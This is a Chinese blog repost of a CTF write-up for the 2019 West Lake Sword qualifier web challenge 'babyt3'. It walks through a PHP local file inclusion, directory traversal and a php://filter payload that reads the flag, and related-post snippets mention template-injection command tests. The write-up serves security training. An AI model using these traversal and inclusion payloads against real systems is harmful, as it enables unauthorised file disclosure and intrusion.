2019西湖论剑预选赛部分WP

最新推荐文章于 2024-04-17 02:45:33 发布
最新推荐文章于 2024-04-17 02:45:33 发布
阅读量382 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/gzs-monkey/p/10699536.html
版权

Web

babyt3

点进链接发现提示

include $_GET['file']

估计是文件包含漏洞

尝试包含index.php,发现一串base64编码,解码得到

<?php
    $a = @$_GET['file']; 
    if (!$a) { 
        $a = './templates/index.html'; 
    } 
    echo 'include $_GET[\'file\']';
     if (strpos('flag',$a)!==false) {  
        die('nonono'); 
    } 
    include $a; 
?>  
<!--hint: ZGlyLnBocA== -->

继续解码hint,得到dir.php,继续尝试包含dir.php,又是一串base64,继续解码

<?php 
    $a = @$_GET['dir']; 
    if(!$a){ 
        $a = '/tmp'; 
    } 
var_dump(scandir($a));

用dir参数遍历目录 dir.php?dir=../../../

读取文件 ?file=../../../ffffflag_1s_Her4

或者继续伪协议读取?file=php://filter/read=convert.base64-encode/resource=../../../ffffflag_1s_Her4  然后再base64解码。

flag{8dc25fd21c52958f777ce92409e2802a}

 

转载于:https://www.cnblogs.com/gzs-monkey/p/10699536.html

weixin_33826609
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WP-2021西湖论剑
ce666666的博客
01-16 1063
2021西湖论剑-wp 前言 全靠大佬打,我是划水的。 灏妹的web 页面开发中 Dirsearch扫一下,idea泄露 ezupload 查看页面源代码,发现提示 ?source=1 发现使用_FILE进行上传,构造上传表单 访问并随便上传一个文件,放到bp里回显no 查看源码最后一个else,在此情况进行渲染temper/index.latte,同时文件也被写入temper。也就是我们上传index.latte的文件。 waf测试 {if “${nl /f*>1}”}{/if} 然后上
精英预选赛
02-13
【精英预选赛】是一个可能与编程竞赛或者技术选拔相关的项目,主要涉及到Python语言的应用。项目的描述虽然简洁,但我们可以从中推断出几个关键的知识点和流程。 首先,"背景"部分通常会介绍这个项目的目的或者它所...
2019西湖论剑web wp
weixin_30307267的博客
04-12 607
发在正文前 这应该是自己在安全圈摸爬滚打两年多以来第一次正规的ctf比赛。没解出flag,没截图,只提供了一些思路。 遥想往昔,初入大学,带着对PT的向往,一个人穿行在幽暗的图书馆,翻阅啃读一本本安全书籍(后来事实证明,纯属瞎折腾。在此也表达下对那些无师自通的大
2019 安恒周周练西湖论剑特别版 pwn 题目wp
abc380620175的博客
03-28 552
pwn1 考点:构造 shellcode,patch 汇编指令 IDA 查看反汇编,程序的逻辑很简单如,如果 直接 f5 的话 IDA 可能识别不出来函数,问题出在 0x080484CF 这个地方,call eax 指令识别不出来,所以这里可以先 patch 成 nop,之后 f5 就正常了。 程序把输入当成 shellcode 直接来执行,很显然是直接往栈上写 shellcode ...
2021西湖论剑wp
qq_48511129的博客
11-22 1060
web OA?RCE? ⽐赛的时候试了下不是弱⼝令(实际上就是admin123,但当时忘试这个了),所以就去⽹上找了改密码 的⽅式,⽤这⾥的⽅法:信呼oa最新版本代码审计 - ma4ter $test = $this->jm- >strlook(json_encode(array("msgtype"=>"editpass","user"=>"admin","pass"=>"lighting")), 'd41d8cd98f00b2...
2023西湖论剑-(部分)WP
xccwxy的博客
02-03 2304
2023西湖论剑-(部分)WP
2019西湖论剑预选赛题目及write up(难度中等)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
基于kesci的文本情感分类源码(2019大数据挑战赛预选赛).zip
01-20
基于kesci的文本情感分类源码(2019大数据挑战赛预选赛).zip 【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴...
2019年阿里巴巴全球数学竞赛预选赛
最新发布
06-17
2019年阿里巴巴全球数学竞赛预选赛Ali_math_competition_3_english_reference_solutions,试题及答案,ali,数学竞赛资料下载
2022西湖论剑 部分wp
qq_61768489的博客
02-05 1241
拿到文件路径/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so。可以考虑用SSRF来绕过)读取 /proc/self/maps 查看当前进程的内存映射关系,发现加载了一个名为zend_test的扩展。参考此文https://xz.aliyun.com/t/9707#toc-11。提取出来,黑白像素转01二进制,注意要竖着跑 ,像素太多,我将结果保存到文件里。总之php文件被加密了,寻找加密猜测应该是有依赖,思路可以是读。
2024西湖论剑-数据安全-PHPEMS_西湖论剑2024wp(1),网络安全架构师之路
code8889的博客
04-17 443
phar触发点在 app/weixin/controller/index.api.php 中的file_getcontents,其中$picurl从xml数据中获取。exec中 虽然说用到了预处理,但是是prepare部分我们仍可以控制,那么这个预处理即使在这里那也是无效的,并不能防止注入。使用上面的exp我们就能把后台密码修改为123456,进入后台就能RCE,这个我们下面在写。题目给的源码中有几个点可以触发注入,但是能用的只有一个点,因为其他的php类没有被加载(利用substr截取。
2021西湖论剑web部分wp
fmyyy1的博客
11-21 1831
前言 快期末了 忙里偷闲打了西湖论剑,队伍第七,又被队友带飞了,web题目质量还可以 OA?RCE? 环境没有写的权限,本地有打通环境打不通的情况很多 之后在webmain/index/indexAction.php处 有个包含任意php文件 有个查看phpinfo的 看了之后开着register_argc_argv,尝试包含pearcmd payload 第一步 ?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2x
2023西湖论剑pwn 部分wp
cainiao78777的博客
02-18 627
也就是*(&v3 + i) = v0 修改一个字节的内容,但是我们也要解一下这个方程,以免程序被exit()而且在buf的下面的变量都是能够覆盖的,也就是说,我们能通过覆盖 i 的值进行数组溢出。一个格式化字符串漏洞,一个栈溢出,但是只能副盖rbp和返回地址,所有要考虑栈迁移。我看有个大佬的解法很奇特,准备学习一下,待我学成,再来补充另外一种方法。泄露出这个函数地址,就能得到 libc——base。根据距离rbp的距离将相应的变量填入。这里的main指的是start,第二次getshell。
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 841
西湖论剑2022pwn
2021西湖论剑网络安全大赛部分WP
七堇年的博客
12-23 4641
2021西湖论剑网络安全大赛WP
2020西湖论剑Crypto BrokenSystem wp
weixin_44795952的博客
10-09 494
题目 打开压缩包的三个文件 查看加密代码 from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_OAEP from secret import flag import os rsa = RSA.generate(2048) public_key = rsa.publickey().exportKey() f=open("public.key","w") f.write(public_key.decode()) f.close()
2022西湖论剑初赛Crypto部分wp
mxx307的博客
02-06 744
西湖论剑·2022中国杭州网络安全技能大赛-初赛 Crypto部分WriteUp
2022西湖论剑-初赛CTF部分wp-Zodiac
toto的博客
02-03 3310
2023西湖论剑初赛CTF部分wp
西湖论剑2020 pwn mmutag wp
weixin_45677731的博客
10-11 470
拿到题目,给了libc库,太可了,爱了爱了 开局malloc(0x68)输入姓名,这个0x68给人一种熟悉的感觉 程序会顺便输出保存着chunk指针的栈地址,暂时没发现有什么吊用 heap的部分,只有malloc和free的功能 并且固定申请0x68的chunk free这里,出现了经典的free之后未置0 而且还刚好是0x68的chunk 常见做法就是double free后劫持malloc_hook 然后就是泄露libc基地址 始终没找到什么好办法,泄露出来的栈地址看似也无法得到libc_base
蓝桥杯python预选赛真题
09-28
引用:这题是关于统计数字1出现次数的问题。题目要求找出一个数,使得从1到这个数之间的所有整数中1出现的次数正好等于2021次。可以通过遍历数字1到一个稍大的数,统计每个数中1的个数,直到满足条件为止。具体代码如下: count = 0 ans = '' for i in range(10000): tmp = str(i) count = count + tmp.count('1') if count == 2021: print(i) break if count > 2021: print(i-1) break 引用:这题的难度级别是简单,主要考察了input函数、in运算、条件分支语句和print函数的使用。首先,input函数用于接受标准输入数据,并返回为字符串类型。其次,in运算可用于判断某个字符或者字符串是否存在于另一个字符串中。然后,条件分支语句if...else用于根据条件的真假执行不同的代码分支。最后,print函数用于打印输出结果。在解题过程中,需要掌握字符串操作和条件判断语句的使用。 引用:这题是关于直线斜率的计算问题。题目给出了一组点的坐标,需要计算通过这些点的直线斜率有多少种不同的情况。可以通过遍历所有的点对,计算它们之间的斜率,并将斜率和截距作为一个元组加入到一个集合中,最后返回集合的长度即可。具体代码如下: X = [] Y = [] for i in range(20): X.append(i) for i in range(21): Y.append(i) ans = set() def calculate_slope(x1, x2, y1, y2): if x1 == x2: return tmp = ((y1-y2)/(x1-x2)) b = 0.5*(y1 + y2) - 0.5*tmp*(x1 + x2) b = round(b, 4) ans.add((tmp, b)) for i in range(20): for j in range(21): for x in range(20): for y in range(21): calculate_slope(i, x, j, y) print(len(ans))

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值